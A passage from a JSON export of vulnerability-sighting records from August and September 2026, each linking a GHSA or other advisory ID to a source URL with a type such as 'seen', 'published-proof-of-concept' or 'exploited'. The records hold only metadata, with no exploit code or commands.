"4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-95X5-QVVM-HMFP", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3412", "content": "", "creation_timestamp": "2026-08-26T17:00:03.983797Z"}, {"uuid": "7a3db5c0-c4aa-4de2-af1c-767d85a09ea9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MM85-Q63V-4476", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3411", "content": "", "creation_timestamp": "2026-08-26T17:00:03.922079Z"}, {"uuid": "b06934b9-5db6-425f-bb59-4dd79d424c51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2wxc-x7rj-hg8f", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mtyqgjnvxv2o", "content": "", "creation_timestamp": "2026-08-26T16:20:29.340702Z"}, {"uuid": "b5ae0e0f-f0c9-4841-ac32-838261685edb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m2pc-3q4q-w6jr", "type": "seen", "source": "https://gist.github.com/alon710/d4e64579bb9348b8491cca97afa7743d", "content": "", "creation_timestamp": "2026-08-26T13:31:41.939213Z"}, {"uuid": "a4c07269-7943-4169-9708-fa4b2e319a8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x2rj-828p-hx9m", "type": "seen", "source": "https://bsky.app/profile/mel-echosphere.bsky.social/post/3mtyggdbg5n2d", "content": "", "creation_timestamp": "2026-08-26T13:21:25.908790Z"}, {"uuid": "ae086e68-29d8-453b-a46b-18fb54c921c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cmwv-wf9p-p8wx", "type": "seen", "source": "https://gist.github.com/alon710/f1f1abcaa50d05cc95fe39660771a422", "content": "", "creation_timestamp": "2026-08-26T12:32:44.796075Z"}, {"uuid": "f6890093-7b96-4b49-a332-09de931e69fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-grp7-v8xh-rj7h", "type": "seen", "source": "https://gist.github.com/alon710/50a574f48857c34c0cb9ded8ce78e9b5", "content": "", "creation_timestamp": "2026-08-26T11:32:18.778378Z"}, {"uuid": "b89ad4f6-9cd5-4c3a-ba3b-6b41b4577954", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mwr4-5g34-j5cq", "type": "seen", "source": "https://gist.github.com/alon710/de2f443dedb4eb6745ce771bf61c5306", "content": "", "creation_timestamp": "2026-08-26T10:31:32.279855Z"}, {"uuid": "9d1adef8-1fd0-4b2b-a1e8-b6f0caed7507", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q8gf-9rvj-gmgj", "type": "seen", "source": "https://gist.github.com/alon710/6e7bd6a50a933b1a1d184dc7dadb1e0f", "content": "", "creation_timestamp": "2026-08-26T09:31:56.167007Z"}, {"uuid": "1b2c7025-53a1-4e28-aa6c-38d44a0ca751", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8QX3-8GM5-9CJ2", "type": "seen", "source": "https://gist.github.com/alon710/f2a12bfbfca0585cae931c87678788d3", "content": "", "creation_timestamp": "2026-08-25T16:32:03.045292Z"}, {"uuid": "9e7cf3db-0bd6-4af2-b2a0-1a97db295758", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rg5q-pp8p-f7jm", "type": "seen", "source": "https://gist.github.com/alon710/a5504500046f829590c5dd3230ab4793", "content": "", "creation_timestamp": "2026-08-25T15:31:34.888488Z"}, {"uuid": "fdf581d9-deba-41e2-a6bf-a1b8b6b4f1b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pvxx-r596-f5qj", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mtw4n6mpoi2y", "content": "", "creation_timestamp": "2026-08-25T15:20:58.665983Z"}, {"uuid": "044ed419-c16f-4200-8837-4d4bc83a0c4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fwjf-m4qw-9f2x", "type": "seen", "source": "https://gist.github.com/alon710/818add0e0ce97b333c2bed9ff2722107", "content": "", "creation_timestamp": "2026-08-25T14:31:39.020671Z"}, {"uuid": "21303e82-a249-4f1f-ba42-2e4d288a2c64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-W67G-5RQW-F597", "type": "seen", "source": "https://gist.github.com/alon710/9348ae05ceeeb4609581f21c2822e2ed", "content": "", "creation_timestamp": "2026-08-25T13:32:10.470068Z"}, {"uuid": "081f9767-5cfb-4f34-adb2-996796fa8ef6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jm48-m3rr-9hgg", "type": "seen", "source": "https://gist.github.com/alon710/782a9d0e0a33092c615e2219299ab6e3", "content": "", "creation_timestamp": "2026-08-25T12:31:18.509157Z"}, {"uuid": "94fb56be-e4ed-476a-9ba1-2e2563995f98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VX2M-JPXR-XV7W", "type": "seen", "source": "https://gist.github.com/alon710/79e310cba90f4f1f20958718aaca8ae9", "content": "", "creation_timestamp": "2026-08-25T11:31:12.406694Z"}, {"uuid": "70a5c80f-9166-4ca4-9500-25acb6be35a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-W8J7-39HP-8X59", "type": "seen", "source": "https://gist.github.com/alon710/f4870b690aa1da14f92ae69cc23adaf4", "content": "", "creation_timestamp": "2026-08-25T10:32:31.731796Z"}, {"uuid": "86f14b5f-ba43-463b-b059-8d330302e910", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FX4F-MHW4-QM7J", "type": "seen", "source": "https://gist.github.com/alon710/653b6e9d66f28c30c9e1c761be426c54", "content": "", "creation_timestamp": "2026-08-25T09:31:42.923018Z"}, {"uuid": "22e58bc7-edeb-4c8f-ab07-deaf7f916188", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x929-528m-vx2m", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mturc5bqhs2j", "content": "", "creation_timestamp": "2026-08-25T02:25:17.385243Z"}, {"uuid": "2f11776a-6fdd-458b-a617-35c7d192934f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hq2v-cgw4-fw2w", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mtur7ukixg2v", "content": "", "creation_timestamp": "2026-08-25T02:24:00.659773Z"}, {"uuid": "9d88ef1c-e1ee-4aba-8830-1f3236a58624", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8jj7-4v57-frf5", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mtuhygrmgv2u", "content": "", "creation_timestamp": "2026-08-24T23:38:47.660860Z"}, {"uuid": "7da9f63c-bfeb-4ebe-b7d7-2cc000bb09b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4PH6-MJV7-3FQ6", "type": "seen", "source": "https://gist.github.com/alon710/420bec7ea2d482fe6de8ec25ca5555ea", "content": "", "creation_timestamp": "2026-08-24T21:31:53.399618Z"}, {"uuid": "5cd4f8b0-e436-4b1a-aeb8-ad04b344fe81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20170317-CMP", "type": "published-proof-of-concept", "source": "https://t.me/informationsec/1739", "content": "", "creation_timestamp": "2026-08-23T00:00:36.793684Z"}, {"uuid": "2f65fdcd-7edf-4bf3-9f2d-6dfa0a3a20e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RRMM-9V76-H3P4", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/98676", "content": "", "creation_timestamp": "2026-08-23T00:00:11.306078Z"}, {"uuid": "950797aa-4380-416d-bbdc-b0f8c59a393e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-P9R8-2Q67-FP86", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/10666", "content": "", "creation_timestamp": "2026-08-23T00:00:07.881407Z"}, {"uuid": "1821590f-b44d-4116-9b5d-79b1d85bfed4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8g74-rjc5-mpch", "type": "seen", "source": "https://bsky.app/profile/glitterbean.wehavecookies.social.ap.brid.gy/post/3mtpdomfacrw2", "content": "", "creation_timestamp": "2026-08-22T22:38:28.917999Z"}, {"uuid": "d46f0804-32bf-438f-bb1f-7a3db4c9aa8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-P9R8-2Q67-FP86", "type": "published-proof-of-concept", "source": "Telegram/ERu4T4czr0cyvCBipfBuyU6gH39cnC4tMspMaA3WxFH9CWo", "content": "", "creation_timestamp": "2026-08-22T22:00:05.110040Z"}, {"uuid": "0c0125f7-3763-4232-844c-858a041a3298", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XV5J-CWGJ-22R4", "type": "published-proof-of-concept", "source": "Telegram/h7a660fTuwfD3Ft0EQIRBNTEBVnTX2h4HNuuHku4oSrD8SU", "content": "", "creation_timestamp": "2026-08-22T22:00:04.975052Z"}, {"uuid": "979c7a49-7adc-42e6-9812-4970c36f8587", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RRMM-9V76-H3P4", "type": "seen", "source": "https://t.me/GithubRedTeam/98676", "content": "", "creation_timestamp": "2026-08-22T19:00:06.595463Z"}, {"uuid": "ec667a7e-8939-4ad4-920c-e684ca4e11b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8HGV-XC77-JMCR", "type": "seen", "source": "https://gist.github.com/alon710/4fa11a336fbb6ab77c0a78c465929e9e", "content": "", "creation_timestamp": "2026-08-21T20:31:50.162582Z"}, {"uuid": "e6ffc162-0ca8-43eb-aa75-ad751c5d7536", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8CFW-PCWH-V63W", "type": "seen", "source": "https://gist.github.com/alon710/5476f02ee350d0dd102b681b35e1425f", "content": "", "creation_timestamp": "2026-08-21T19:32:14.028313Z"}, {"uuid": "f645289e-3462-48c9-b37c-0953933c7f6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p9r8-2q67-fp86", "type": "seen", "source": "https://bsky.app/profile/securityrss.bsky.social/post/3mtmg5ti2u72d", "content": "", "creation_timestamp": "2026-08-21T18:44:44.705988Z"}, {"uuid": "5c7ac8f3-75ea-4f7a-956f-13ae3769ba37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q9c5-pp7m-fm2g", "type": "seen", "source": "https://gist.github.com/alon710/0122b45acaabf4bffe85ea5b5b868155", "content": "", "creation_timestamp": "2026-08-21T18:31:25.879242Z"}, {"uuid": "a1537a09-1837-47f3-a431-c83cc48c100b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RXHG-VCWW-2MPW", "type": "seen", "source": "https://gist.github.com/alon710/e119e0e3dc0dc9f08b09963cc2e8d5fb", "content": "", "creation_timestamp": "2026-08-21T15:31:46.367655Z"}, {"uuid": "7e3ddad7-2bb3-40d4-bcfd-cb0d99a2edca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7mpf-4465-7fc2", "type": "seen", "source": "https://gist.github.com/alon710/e698539f8539d91595e3fc297e68257c", "content": "", "creation_timestamp": "2026-08-21T13:31:39.509107Z"}, {"uuid": "2619e7f2-733f-4857-b828-2d955443982f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MPMW-F6H6-3G26", "type": "seen", "source": "https://gist.github.com/alon710/67db9159d1345bdc7ca8782a080ca880", "content": "", "creation_timestamp": "2026-08-21T12:31:52.297527Z"}, {"uuid": "63577f21-755a-4b0f-90fa-0ab4326c9ae8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FM29-4MQ3-PHG6", "type": "seen", "source": "https://gist.github.com/alon710/35dc9a9f4fdde910b87a4f845467f8ee", "content": "", "creation_timestamp": "2026-08-21T11:33:52.582366Z"}, {"uuid": "e4795816-735e-45a8-8b08-9f710b00ae35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5CWR-5JXG-PCF6", "type": "seen", "source": "https://gist.github.com/alon710/51fb54a21f3c76c1b91209b9a15704de", "content": "", "creation_timestamp": "2026-08-21T10:32:44.014379Z"}, {"uuid": "5d2cffa1-ce8d-4967-a96b-d53f0461616b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7gwp-5pfp-969j", "type": "seen", "source": "https://bsky.app/profile/mel-echosphere.bsky.social/post/3mtlgunnc4g2v", "content": "", "creation_timestamp": "2026-08-21T09:24:49.714920Z"}, {"uuid": "78337b51-4d1b-4394-b832-08d8d515c101", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-P2CH-C2C3-4XM5", "type": "seen", "source": "https://gist.github.com/alon710/8e50b2fdebb434d200c6fb50163d57dd", "content": "", "creation_timestamp": "2026-08-21T09:04:13.915474Z"}, {"uuid": "3c4956a6-6932-4f6b-a0f2-eba2f94693e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-92HV-J533-69WC", "type": "seen", "source": "https://gist.github.com/alon710/7842c3c142867ceb50ac8440e801b01e", "content": "", "creation_timestamp": "2026-08-21T08:35:12.907296Z"}, {"uuid": "f550847a-cd27-455e-ad4c-49bcf7c37973", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-HQ84-X37P-J6Q5", "type": "seen", "source": "https://gist.github.com/alon710/4c9a95ca17a175b6a01393b89f2d4adf", "content": "", "creation_timestamp": "2026-08-21T08:35:07.998049Z"}, {"uuid": "5ad1ca0a-9688-42b4-9603-f0b3783772df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8cfx-wx3q-mh5q", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mtkgtu56b62v", "content": "", "creation_timestamp": "2026-08-20T23:51:43.200519Z"}, {"uuid": "64525b9d-2d27-4427-a935-e2d5c15b4b05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-R9MR-M37C-5FR3", "type": "seen", "source": "https://t.me/bdufstecru/3391", "content": "", "creation_timestamp": "2026-08-19T16:00:03.849288Z"}, {"uuid": "500ebf7e-b1dd-4f92-be08-225aaf0c8710", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w27m-rmmf-g5w4", "type": "seen", "source": "https://gist.github.com/alon710/af2c8d3762565eaa4715277e9dc15159", "content": "", "creation_timestamp": "2026-08-19T13:32:06.734295Z"}, {"uuid": "2a2dba25-f141-48d0-9309-63fb9bbc7d17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5rw4-4665-cvwf", "type": "seen", "source": "https://gist.github.com/alon710/ac73b2e180b3b5bc212b2c31ca85b161", "content": "", "creation_timestamp": "2026-08-19T12:33:17.954388Z"}, {"uuid": "d0917a0b-a1a5-4e06-b410-308e610e3f94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xpr4-8vp6-c87j", "type": "seen", "source": "https://gist.github.com/alon710/3948341428804c685cf1bc5b4fc0d3f1", "content": "", "creation_timestamp": "2026-08-19T11:32:39.287441Z"}, {"uuid": "54a1548e-7171-4f4c-92de-2e58d2a9599d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7788-ghfq-c6mh", "type": "seen", "source": "https://gist.github.com/alon710/0cc60371850e568781debde747fcbd5a", "content": "", "creation_timestamp": "2026-08-19T10:31:45.363235Z"}, {"uuid": "812b56ad-4d2c-4276-b045-2621f91a753e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xpmj-wjcp-6pww", "type": "seen", "source": "https://gist.github.com/alon710/f8eaee2020ed8f819add6f9d1de77bf8", "content": "", "creation_timestamp": "2026-08-19T09:32:00.709816Z"}, {"uuid": "96536838-b277-4027-8c96-c68c5d4b2773", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f3qq-49m6-rw8f", "type": "seen", "source": "https://gist.github.com/alon710/db3f4019c2372dbb6dfede560d6093f7", "content": "", "creation_timestamp": "2026-08-19T08:31:37.425422Z"}, {"uuid": "0a266506-a7fd-4e27-a0e7-73010a670ec5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v5rc-cpwc-cfpr", "type": "seen", "source": "https://gist.github.com/alon710/048e89a8b6d23388e5627d9e6207e2ad", "content": "", "creation_timestamp": "2026-08-19T07:31:59.362766Z"}, {"uuid": "126d1615-8f9b-4495-9674-a100b9aa8ecb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v2wp-frmc-5q3v", "type": "seen", "source": "https://gist.github.com/alon710/048e89a8b6d23388e5627d9e6207e2ad", "content": "", "creation_timestamp": "2026-08-19T07:31:59.262475Z"}, {"uuid": "74244bc8-7c15-4ce7-abde-7caf171102dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8qf9-62x2-82pp", "type": "seen", "source": "https://gist.github.com/alon710/259d2014ae004d0972fa015a9b341f1e", "content": "", "creation_timestamp": "2026-08-18T02:33:46.569946Z"}, {"uuid": "1dd6f9a2-40b0-430b-955a-f71f740cdec3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7835-87q9-rgvv", "type": "seen", "source": "https://bsky.app/profile/bokonon.ai/post/3mvibucyh6a2t", "content": "", "creation_timestamp": "2026-09-14T14:07:33.349294Z"}, {"uuid": "95ce4b54-5901-4f78-aa8d-90c47578be6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-R6JX-9G48-2R5R", "type": "published-proof-of-concept", "source": "https://t.me/cissp/4117", "content": "", "creation_timestamp": "2026-09-10T22:00:04.248536Z"}, {"uuid": "e5f2ba74-bd36-4a73-bea1-143ee9a2278c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hf57-cqmx-p4gr", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/117248880902302923", "content": "", "creation_timestamp": "2026-09-10T21:32:22.453735Z"}, {"uuid": "cd3ecdc7-b6b9-40a9-a4d8-8e82681b64fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6xcw-7xm6-48c6", "type": "seen", "source": "https://bsky.app/profile/thecompound.tech/post/3mv6xfdqrvd24", "content": "", "creation_timestamp": "2026-09-10T21:06:16.755079Z"}, {"uuid": "27852dbd-85b0-4c47-b122-1e5151f2dbc5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ALE-010", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/117247591357513667", "content": "", "creation_timestamp": "2026-09-10T16:04:28.313974Z"}, {"uuid": "5ce3a214-8ef9-439f-ae53-79c517ae9cb0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-JFH8-C2JP-5V3Q", "type": "exploited", "source": "https://t.me/cissp/5052", "content": "", "creation_timestamp": "2026-09-10T12:00:04.821040Z"}, {"uuid": "bafc64df-b682-4d05-9c36-4e6043bf1ad7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9P78-P5G6-GCJ8", "type": "seen", "source": "https://t.me/Intel_Encyclopedia/2574", "content": "", "creation_timestamp": "2026-09-09T05:00:11.363815Z"}, {"uuid": "c0865201-0a81-43d5-b9e1-8fb5757b3e63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WVXP-WPWP-MMPW", "type": "seen", "source": "https://t.me/Intel_Encyclopedia/2853", "content": "", "creation_timestamp": "2026-09-09T05:00:09.192155Z"}, {"uuid": "617fb797-5a9e-4b01-bcde-4d3abfe1c8fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-JQ6G-CCMP-VCCR", "type": "seen", "source": "https://t.me/Intel_Encyclopedia/2852", "content": "", "creation_timestamp": "2026-09-09T05:00:09.160781Z"}, {"uuid": "15385e67-3e14-4c78-9086-6421230d3963", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-P6HP-93WP-FH6P", "type": "seen", "source": "https://t.me/GithubRedTeam/101570", "content": "", "creation_timestamp": "2026-09-09T05:00:06.593192Z"}, {"uuid": "18f1bf1e-5997-4401-992e-fa28a693a12c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p498-v437-472g", "type": "seen", "source": "https://gist.github.com/citadelculture/5ad0a838a902eb1cbf2ff2ff33472c61", "content": "", "creation_timestamp": "2026-09-08T06:19:13.809942Z"}, {"uuid": "0d3215c6-21a3-46df-a11a-451fedb3911c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p498-v437-472g", "type": "seen", "source": "https://gist.github.com/citadelculture/3678c1e4a608c68f0eafa788752e095c", "content": "", "creation_timestamp": "2026-09-08T06:19:13.729923Z"}, {"uuid": "4f794de1-0523-439c-8282-b3132ddd774f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p498-v437-472g", "type": "seen", "source": "https://gist.github.com/citadelculture/59ba3685c4ac125fd240e01b8fcee60a", "content": "", "creation_timestamp": "2026-09-08T06:19:12.302908Z"}, {"uuid": "b528ab62-b79a-4ef1-9a96-35d447af418c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-P44J-XRQG-4XRR", "type": "published-proof-of-concept", "source": "https://t.me/hacking_Attack/11108", "content": "", "creation_timestamp": "2026-09-08T05:00:04.056352Z"}, {"uuid": "422a1e21-a166-4a79-8850-453010e78797", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p569-5gjg-9cmj", "type": "seen", "source": "https://bsky.app/profile/securityonline.bsky.social/post/3muxt5p4z2r2x", "content": "", "creation_timestamp": "2026-09-08T01:01:46.898175Z"}, {"uuid": "00bfde31-740e-4d29-af19-dc284484c0dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xwwr-4h3p-r22c", "type": "seen", "source": "https://bsky.app/profile/securityonline.bsky.social/post/3muxt5p4z2r2x", "content": "", "creation_timestamp": "2026-09-08T01:01:46.864814Z"}, {"uuid": "640d8f9f-bd7e-41be-80f9-56aa249d85a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-V8P8-4W8F-QH34", "type": "published-proof-of-concept", "source": "https://t.me/hacking_Attack/14865", "content": "", "creation_timestamp": "2026-09-08T01:00:04.023064Z"}, {"uuid": "00341c9e-2e7a-4564-9d34-7914520eb80b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M87F-9FVV-2MGG", 